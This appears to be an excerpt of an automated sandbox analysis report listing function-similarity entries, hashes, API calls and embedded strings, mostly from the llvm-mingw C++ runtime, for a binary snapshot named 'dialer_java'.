                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: mallocmemcpy
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 4276657696-3503049562
                                      • Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
                                      • Instruction ID: 4bdc5bf315088304cef6b9371002479283016a7ed2b4b11b7b4f51d233f192c3
                                      • Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
                                      • Instruction Fuzzy Hash: 95718F33719B8282EA61DB19F4823BA6BA4FB44780F444035DB8D97B95EF3DE084C349
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fwprintf$fputwcstrlen
                                      • String ID: %*.*S$%-*.*S$%.*S
                                      • API String ID: 3854221471-2115465065
                                      • Opcode ID: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
                                      • Instruction ID: 4be5fd3d5a4604238b04ab9348e77bc660084df44cb697a2e9963dab82df00d0
                                      • Opcode Fuzzy Hash: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
                                      • Instruction Fuzzy Hash: 0C5172B3B2864287E7748F0EE15573A7BA0EB94B50F014135DB5ED76A0DE3EE8818B05
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: abortfflush$UnwindVirtual
                                      • String ID: float registers unimplemented$getFloatReg$libunwind: %s - %s$setFloatReg
                                      • API String ID: 3704712045-981669299
                                      • Opcode ID: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
                                      • Instruction ID: f442c5e448b358199035f5343901968c35a32f1691f7b4f46840afdb149a8378
                                      • Opcode Fuzzy Hash: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
                                      • Instruction Fuzzy Hash: A631CC73B15B9681E714EB6DF44A3B93B65EB44784F00403ADA4EA3791CE3ED582C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fputwcfwprintf
                                      • String ID: %*.*s$%-*.*s$%.*s$%s
                                      • API String ID: 3232229890-407542676
                                      • Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
                                      • Instruction ID: bd9ed510e85daab7e04dbc231cf832698fc643839c1db50cafdb71b0d85a4fee
                                      • Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
                                      • Instruction Fuzzy Hash: 0E5155B3F2450287E7788E1EE45273A7BA1EB44750B114139DB9ED76A1DE3EE8808B05
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$_assertmemcpy
                                      • String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
                                      • API String ID: 2140428464-3850676658
                                      • Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
                                      • Instruction ID: d4c69ff5f3f1f37a41718a411e10b2fbe7049ed4090cd19d5a9a510bad1e9f8c
                                      • Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
                                      • Instruction Fuzzy Hash: D441D2B3B06B8282DE28CF4AE4863B967A5EB54BC4F048531CB9E57795EF3DD0818301
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertmalloc$memcpy
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$FromPosition <= Names.size()$Index <= size() && "dropBack() can't expand!"
                                      • API String ID: 4247363904-2992651634
                                      • Opcode ID: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
                                      • Instruction ID: 53dc66c38df8ca31d5c5759287c03fa564fd9d4e6442b7d00b650405d59e68e9
                                      • Opcode Fuzzy Hash: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
                                      • Instruction Fuzzy Hash: B341BF73729A4280EA249B0DE8497A97BA0FB547C4F494039EE5D6B791EE3DE4C4C309
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflush$Unwindabort
                                      • String ID: _Unwind_Resume$_Unwind_Resume() can't return$libunwind: %s - %s$libunwind: _Unwind_Resume(ex_obj=%p)
                                      • API String ID: 3252057912-3900785416
                                      • Opcode ID: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
                                      • Instruction ID: f0f09905e26c6bbde862b4f06fa334cf614e9713fe9aab5b246702b13644eed4
                                      • Opcode Fuzzy Hash: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
                                      • Instruction Fuzzy Hash: 16416E22E1CBC181F6369B18A4163F9A774FFD9384F005226EA8C12665EF7ED2D2C745
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: abortfflush
                                      • String ID: getReg$libunwind: %s - %s$setReg$unsupported register
                                      • API String ID: 4129902348-1024193272
                                      • Opcode ID: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
                                      • Instruction ID: 651edc1413b16fc8d0b4b7c4112c091210269d1deeac265331184ec02dad6339
                                      • Opcode Fuzzy Hash: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
                                      • Instruction Fuzzy Hash: D5115462F0A59B51EA14AB5DA85F3B81F56DF81781F40803AD50DA33A6DE3EA582C307
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: isxdigit$malloc
                                      • String ID:
                                      • API String ID: 1399014089-0
                                      • Opcode ID: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
                                      • Instruction ID: 14fcf3f01b1f3c4309c0a14f768ac40f4bcb36554c11ba5b80dee1988eafe36c
                                      • Opcode Fuzzy Hash: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
                                      • Instruction Fuzzy Hash: 60418523708F8282E7584F38E49537A6BA4BB44F41F084175CAADA66D5DF7DE4E1C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: mallocrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 948496778-4167058683
                                      • Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
                                      • Instruction ID: 02ac2b0f4d4df6a05bb346250d64fbddae422c0fe589f830a1e4b38dfe606d9b
                                      • Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
                                      • Instruction Fuzzy Hash: 5461E2A3B06B8681DB148B19E4897BD7BA0EB04B84F448232DB5D977D4DF3DE192C349
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID: or<char>
                                      • API String ID: 1833655766-3520798227
                                      • Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
                                      • Instruction ID: df57e3db1fa30eb5ad5b7f6cf5b8fe84a861f3cf47c20babcd8bdf6fd1534fd6
                                      • Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
                                      • Instruction Fuzzy Hash: 1C5182B3A06B8682DE258F59E5953A9B761EB95BC4F00C132CB8E57795EF3CE180C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assert$callocmemset
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp$reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0$reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0
                                      • API String ID: 1513271871-212362933
                                      • Opcode ID: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
                                      • Instruction ID: 6188ab9744db7334354b19850b0a162094f93c7051a57e5acd56ceb7ff506dd3
                                      • Opcode Fuzzy Hash: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
                                      • Instruction Fuzzy Hash: 2741E553B3965380FA159F1DA817BB93BA9AF51780F414031C91EA3794EE3FA582C30A
                                      APIs
                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF6E3A8FEF8,00007FF6E3A8FEF8,?,?,00007FF6E3A60000,?,00007FF6E3A62521), ref: 00007FF6E3A627F3
                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF6E3A8FEF8,00007FF6E3A8FEF8,?,?,00007FF6E3A60000,?,00007FF6E3A62521), ref: 00007FF6E3A62857
                                      • memcpy.MSVCRT ref: 00007FF6E3A62870
                                      • GetLastError.KERNEL32(?,?,?,?,00007FF6E3A8FEF8,00007FF6E3A8FEF8,?,?,00007FF6E3A60000,?,00007FF6E3A62521), ref: 00007FF6E3A628B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                      • API String ID: 2595394609-2123141913
                                      • Opcode ID: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
                                      • Instruction ID: c6fc43f25b4a9a7d8732d3b1ef9871a52f8369be64381eed896d46df069eae4e
                                      • Opcode Fuzzy Hash: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
                                      • Instruction Fuzzy Hash: 0D41B2A3B1964291EA108B1DE8467B83FA1FB95F80F104472CD0EE3791CE3EE585C74A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_ostream$starts_with(SV, "basic_")
                                      • API String ID: 2326172077-1855325571
                                      • Opcode ID: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
                                      • Instruction ID: 33bf734396f08eaad5ae40a6ef0176289b6f25cb36e3fafc694a9e8eec21a36b
                                      • Opcode Fuzzy Hash: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
                                      • Instruction Fuzzy Hash: 4611C4F3F0574282EA688B0DF5853796BA1EF54BC5F448035CA4D97A94EF2EE1D18305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertabort
                                      • String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND)$actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND)$actions & _UA_SEARCH_PHASE
                                      • API String ID: 1072228434-30274522
                                      • Opcode ID: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
                                      • Instruction ID: 390e2591692bba896839b38e2c3588f784e7d2e8542f148179b5353f9cfa3ad4
                                      • Opcode Fuzzy Hash: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
                                      • Instruction Fuzzy Hash: DEF0E223F2894690EA74879EEC876B42F189F147A5F410932DD1DE62E0ED3EE4C7C206
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 2517790541-0
                                      • Opcode ID: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
                                      • Instruction ID: f52af862b89fb3cb4ead39d402a58b908d03a95bafeffebf6a500ab6eeef16db
                                      • Opcode Fuzzy Hash: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
